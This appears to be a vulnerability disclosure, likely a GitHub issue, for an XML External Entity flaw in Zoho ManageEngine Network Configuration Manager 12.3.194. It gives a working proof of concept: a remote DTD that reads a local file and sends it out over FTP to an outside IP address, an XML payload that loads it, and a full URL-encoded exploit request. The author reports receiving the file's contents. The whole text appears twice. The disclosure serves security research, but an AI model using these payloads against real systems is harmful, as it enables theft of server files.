A XML External Entity injection(XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.
My vps’s evil.xml
<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;
I used the Ftp protocol to read file, it can read the file c:\test.txt.
The test.txt is just for test.
Then i used the poc to request my vps’s evil.xml.
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPEroot [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>
The vulnerability exists in the /devices/ProcessRequest.do?RequestID=463&RequestXML=,so i tested it by the poc which was urlencoded.
Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability
Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
A XML External Entity injection(XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.
My vps’s evil.xml
<!ENTITY % file SYSTEM "file:///c:\test.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://69.194.9.178:2121/%file;'>"> %int; %send;I used the Ftp protocol to read file, it can read the file c:\test.txt.
The test.txt is just for test.

Then i used the poc to request my vps’s evil.xml.
The vulnerability exists in the
/devices/ProcessRequest.do?RequestID=463&RequestXML=,so i tested it by the poc which was urlencoded.http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3EIn my vps ,i used the python script to open ftp protocol for accepting data

When i sent the request , I accepted the content of test.txt in my vps.


The text was updated successfully, but these errors were encountered: